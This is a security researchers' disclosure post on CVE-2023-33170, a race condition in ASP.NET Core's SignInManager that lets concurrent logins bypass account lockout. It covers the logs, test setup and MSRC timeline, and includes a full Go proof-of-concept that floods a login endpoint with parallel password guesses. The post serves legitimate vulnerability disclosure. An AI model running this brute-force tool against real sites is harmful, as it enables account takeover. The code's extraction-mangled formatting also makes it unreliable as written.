Security Feature Bypass In ASP.NET and Visual Studio

July 12, 2023

CVE-2023-33170 Attributions

So What Happened?

Early indications of the system highlighted the culprit to be the ASP.NET SignInManager as when this function is called it ‘Attempts to sign in the specified userName and password combination as an asynchronous operation’. With asynchronous operations, when multiple threads can access or change a shared resource a race condition can occur. When looking at the database logs it was observed that this was happening. A snippet of the database log is included below, with an error indicating that a ‘Microsoft.EntityFrameworkCore.DbUpdateConcurrencyException’ was present and that the ‘database operation failed as the data may have been modified or deleted’

‍

_{fail: Microsoft.EntityFrameworkCore.Update[10000] An exception occurred in the database while saving changes for context type 'WebApp.Data.ApplicationDbContext'. Microsoft.EntityFrameworkCore.DbUpdateConcurrencyException: The database operation was expected to affect 1 row(s), but actually affected 0 row(s); data may have been modified or deleted since entities were loaded. See http://go.microsoft.com/fwlink/?LinkId=527962 for information on understanding and handling optimistic concurrency exceptions. at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ThrowAggregateUpdateConcurrencyExceptionAsync(RelationalDataReader reader, Int32 commandIndex, Int32 expectedRowsAffected, Int32 rowsAffected, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ConsumeResultSetWithRowsAffectedOnlyAsync(Int32 commandIndex, RelationalDataReader reader, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ConsumeAsync(RelationalDataReader reader, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.ReaderModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.ReaderModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.SqlServer.Update.Internal.SqlServerModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.ChangeTracking.Internal.StateManager.SaveChangesAsync(IList`1 entriesToSave, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.ChangeTracking.Internal.StateManager.SaveChangesAsync(StateManager stateManager, Boolean acceptAllChangesOnSuccess, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.SqlServer.Storage.Internal.SqlServerExecutionStrategy.ExecuteAsync[TState,TResult](TState state, Func`4 operation, Func`4 verifySucceeded, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.DbContext.SaveChangesAsync(Boolean acceptAllChangesOnSuccess, CancellationToken cancellationToken) Microsoft.EntityFrameworkCore.DbUpdateConcurrencyException: The database operation was expected to affect 1 row(s), but actually affected 0 row(s); data may have been modified or deleted since entities were loaded. See http://go.microsoft.com/fwlink/?LinkId=527962 for information on understanding and handling optimistic concurrency exceptions. at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ThrowAggregateUpdateConcurrencyExceptionAsync(RelationalDataReader reader, Int32 commandIndex, Int32 expectedRowsAffected, Int32 rowsAffected, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ConsumeResultSetWithRowsAffectedOnlyAsync(Int32 commandIndex, RelationalDataReader reader, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.AffectedCountModificationCommandBatch.ConsumeAsync(RelationalDataReader reader, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.ReaderModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.ReaderModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.SqlServer.Update.Internal.SqlServerModificationCommandBatch.ExecuteAsync(IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.Update.Internal.BatchExecutor.ExecuteAsync(IEnumerable`1 commandBatches, IRelationalConnection connection, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.ChangeTracking.Internal.StateManager.SaveChangesAsync(IList`1 entriesToSave, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.ChangeTracking.Internal.StateManager.SaveChangesAsync(StateManager stateManager, Boolean acceptAllChangesOnSuccess, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.SqlServer.Storage.Internal.SqlServerExecutionStrategy.ExecuteAsync[TState,TResult](TState state, Func`4 operation, Func`4 verifySucceeded, CancellationToken cancellationToken) at Microsoft.EntityFrameworkCore.DbContext.SaveChangesAsync(Boolean acceptAllChangesOnSuccess, CancellationToken cancellationToken)}

These errors highlighted multiple concurrent requests are attempting to update the database, with many of these requests failing to update appropriately. This is due to the next concurrent request already modifying the database. As a result, many login attempts are performed, but the database is not modified consistently, indicating a race condition may be present allowing a user to perform a brute-force attack. Jack Moran decided to write a proof of concept to test this out locally which resulted in thousands of failed authentication requests being conducted before triggering the lockout threshould.

So You Want The PoC?

_package_main_import_{( "bytes" "encoding/base64" "flag" "fmt" "math/rand" "net/http" "net/url" "strings" "sync" )}_type_{RequestResult}_struct_{{ UUID}_int_{ResponseStatus}_int_{ResponseLocation}_string_}_func_{Request(HttpClient}_*_http_._{Client, UniversalResourceLocator}_string_{, HttpPayload []}_byte_{, CookieName}_string_{, CookieValue}_string_{, Data}_chan_{RequestResult, Trigger}_chan_bool_{, UUID}_int_{, WaitGroup}_*_sync_._{WaitGroup) {}_{// Mark WaitGroup as Done When Function Exits}_defer_WaitGroup_._Done()_<-_Trigger_{// Create HTTPRequest and RequestError, Return if RequestError}_{HttpRequest, RequestError}_:=_http_._{NewRequest(http}_._{MethodPost, UniversalResourceLocator, bytes}_._{NewBuffer(HttpPayload))}_if_RequestError_!=_{nil { fmt}_._{Println("Error creating request:", RequestError)}_return_}_{// Create Cookie}_Cookie_:=_&_http_._{Cookie{ Name}_:_{CookieName, Value}_:_{CookieValue, }}_{// Add HTTPHeader and HTTPCookie}_HttpRequest_._Header_._{Set("Content-Type", "application/x-www-form-urlencoded") HttpRequest}_._{AddCookie(Cookie)}_{// Create HTTPResponse and ResponseError, Do HttpRequest, Return if RequestError}_{HttpResponse, ResponseError}_:=_HttpClient_._{Do(HttpRequest)}_if_{ResponseError}_!=_{nil { fmt}_._{Println("Error making request:", ResponseError)}_return_}_defer_HttpResponse_._Body_._Close()_{// Store HTTPResponse In Struct}_Result_:=_{RequestResult{ UUID}_:_{UUID, ResponseStatus}_:_HttpResponse_._{StatusCode, ResponseLocation}_:_HttpResponse_._Header_._{Get("Location"), }}_{// Send Struct to Data Channel}_Data_<-_Result }_func_{generateSomeBytes()}_string_{_{// Psudo random number generator}_RandomBytes_:=_make([]_byte_{, 8) rand}_._{Read(RandomBytes)}_return_base64_._StdEncoding_._{EncodeToString(RandomBytes) }}_func_{main() {}_{// Define Veriables}_var_{NumberRequests}_int_var_UserName_string_var_URL_string_var_{RequestVerificationToken}_string_var_CookieName_string_var_CookieValue_string_var_{LoginFailureCount}_int_var_{LoginLockoutCount}_int_var_{LoginSuccessCount}_int_var_WaitGroup₌_sync_._WaitGroup{}_{// Define Execution Flags}_flag_._IntVar(_&_{NumberRequests, "requests", 1, "Number of Requests") flag}_._StringVar(_&_{UserName, "username", "", "Target Username") flag}_._StringVar(_&_{URL, "url", "", "Target URL") flag}_._StringVar(_&_{RequestVerificationToken, "csrf", "", "Csrf-Token") flag}_._StringVar(_&_{CookieName, "cookiename", "", "CookieName") flag}_._StringVar(_&_{CookieValue, "cookievalue", "", "CookieName") flag}_._Parse()_{// Create Bad and Good Credentials as Form Data Payload.}_{BadCredentials}_:=_url_._{Values{ "Input.Email"}_:_{{UserName}, "Input.Password"}_:_{{generateSomeBytes()}, "__RequestVerificationToken"}_:_{{RequestVerificationToken}, } GoodCredentials}_:=_url_._{Values{ "Input.Email"}_:_{{UserName}, "Input.Password"}_:_{{"APassword"}, "__RequestVerificationToken"}_:_{{RequestVerificationToken}, }}_{// Create HTTPClient, Check Redirect Is Pressent Return}_HTTPClient_:=_&_http_._{Client{ CheckRedirect}_:_func_(HttpRequest_*_http_._{Request, via []}_*_http_._Request)_error_{_return_http_._{ErrUseLastResponse }, }}_{// Create DataChannel, TriggerChannel for GoRoutines}_var_DataChannel₌_make(_chan_{RequestResult, NumberRequests)}_var_{TriggerChannel}₌_make(_chan_bool₎_var_rand₌_rand_._{Intn(NumberRequests) WaitGroup}_._{Add(NumberRequests)}_for_i_:=_{0; i}_<_{NumberRequests; i}₊₊_{_if_i₌₌_{rand {}_go_{Request(HTTPClient, URL, []}_byte_{(GoodCredentials}_._{Encode()), CookieName, CookieValue, DataChannel, TriggerChannel, i,}_&_{WaitGroup) }}_else_{_go_{Request(HTTPClient, URL, []}_byte_{(BadCredentials}_._{Encode()), CookieName, CookieValue, DataChannel, TriggerChannel, i,}_&_{WaitGroup) } } close(TriggerChannel)}_{// Mark WaitGroup as Wait for all GoRoutines to Finish}_WaitGroup_._Wait()_{// Looping Through Results, Check if Login FAIL, LOCK, or PASS}_for_i_:=_{0; i}_<_{NumberRequests; i}₊₊_{{ Results}_:=_<-_DataChannel_if_strings_._{Contains(Results}_._{ResponseLocation, "")}_&&_Results_._{ResponseStatus}₌₌_{200 { fmt}_._{Printf("[\033[31m!\033[0m] LOGIN FAIL - Request: %d \n", Results}_._{UUID) LoginFailureCount}₊₌_{1 }}_else_if_strings_._{Contains(Results}_._{ResponseLocation, "/Identity/Account/Lockout")}_&&_Results_._{ResponseStatus}₌₌_{302 { fmt}_._{Printf("[\033[33m-\033[0m] LOGIN LOCK - Request: %d \n", Results}_._{UUID) LoginLockoutCount}₊₌_{1 }}_else_if_strings_._{Contains(Results}_._{ResponseLocation, "/")}_&&_Results_._{ResponseStatus}₌₌_{302 { fmt}_._{Printf("[\033[32m✓\033[0m] LOGIN PASS - Request: %d \n", Results}_._{UUID) LoginSuccessCount}₊₌_{1 } }}_{// PRINTING VALUES}_fmt_._{Println("") fmt}_._{Println("[\033[31m!\033[0m] FAIL login Count:", LoginFailureCount) fmt}_._{Println("[\033[33m-\033[0m] LOCK login Count:", LoginLockoutCount) fmt}_._{Println("[\033[32m✓\033[0m] PASS login Count:", LoginSuccessCount) }}

Development of Testing Environment

While the proof of concept was in development, Ethan McKee-Harris deployed a testing environment based on Microsoft’s ‘Create a Web app with authentication’ documentation. A local server and web application was set up to verify that this is not isolated to the current engagement but could be widespread in the SignInManger itself. After installing the latest version of dotnet (at the time we were testing), we generated a new web application using Microsoft’s scaffolding:

_{dotnet new webapp --auth Individual -o WebApp}

After creating the scaffolded web application, developers can also install templated account management with the following commands:

_{cd WebApp dotnet tool install -g dotnet-aspnet-codegenerator dotnet add package Microsoft.VisualStudio.Web.CodeGeneration.Design dotnet aspnet-codegenerator identity -dc WebApp.Data.ApplicationDbContext --files "Account.Register;Account.Login;Account.Logout;Account.RegisterConfirmation" --databaseProvider}₌_sqlite

Navigate to and open the file Areas/Identity/Pages/Account/Login.cshtml.cs. Change the PasswordSignInAsync method call so that lockoutOnFailure is set to true. We also need to enable account lockout, so navigate to Program.cs in the base web application directory. After the builder is defined, paste the following configuration options. This sets up the requirements to support account lockout on our test web application.

_{builder.Services.Configure<IdentityOptions>(options => { // Password settings. // Turn off requirements for testing purposes options.Password.RequireDigit = false; options.Password.RequireLowercase = false; options.Password.RequireNonAlphanumeric = false; options.Password.RequireUppercase = false; options.Password.RequiredLength = 6; options.Password.RequiredUniqueChars = 1; // Lockout settings. options.Lockout.DefaultLockoutTimeSpan = TimeSpan.FromMinutes(5); options.Lockout.MaxFailedAccessAttempts = 5; options.Lockout.AllowedForNewUsers = true; // User settings. options.User.AllowedUserNameCharacters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._@+"; options.User.RequireUniqueEmail = false; }); builder.Services.ConfigureApplicationCookie(options => { // Cookie settings options.Cookie.HttpOnly = true; options.ExpireTimeSpan = TimeSpan.FromMinutes(5); options.LoginPath = "/Identity/Account/Login"; options.AccessDeniedPath = "/Identity/Account/AccessDenied"; options.SlidingExpiration = true; });}

Further to this, if you wish to conduct testing from non-local IP addresses, add the following config to appsettings.json in order to expose the web application to all IP addresses.

_{"Kestrel": { "EndPoints": { "Http": { "Url": "http://0.0.0.0:5010" } } }}

Then to run the application, simply use dotnet run on the command line.

Throughout the disclosure process, Microsoft have been exceedingly helpful. Working within the bounds of the Microsoft Security Researcher Center (MSRC) disclosure policy, they were quick to confirm the issue and work with ZX Security to navigate the vulnerability through the various stages, resulting in a patch that resolves the issues.

Vulnerability Disclosure Timeline (NZST):

03/03/2023 - Discovered a race condition in ASP.NET Core SignInManager
07/03/2023 - Submission of vulnerability to Microsoft Security Research Center for review
08/03/2023 - MSRC: Case Number Assigned, Stage - New
08/03/2023 - MSRC: Vulnerability Being Reviewed, Stage - Review/Reproduce
07/04/2023 - MSRC: Vulnerability Confirmed, Stage - Develop
18/05/2023 - MSRC: Vulnerability Disclosure Extension Request
26/05/2023 - MSRC: Vulnerability Severity Rating Important (High), Stage - Develop
12/07/2023 - MSRC: Vulnerability Fixed, Stage - PreRelease
12/07/2023 - MSRC: Vulnerability Fixed, Stage - Complete

References

‍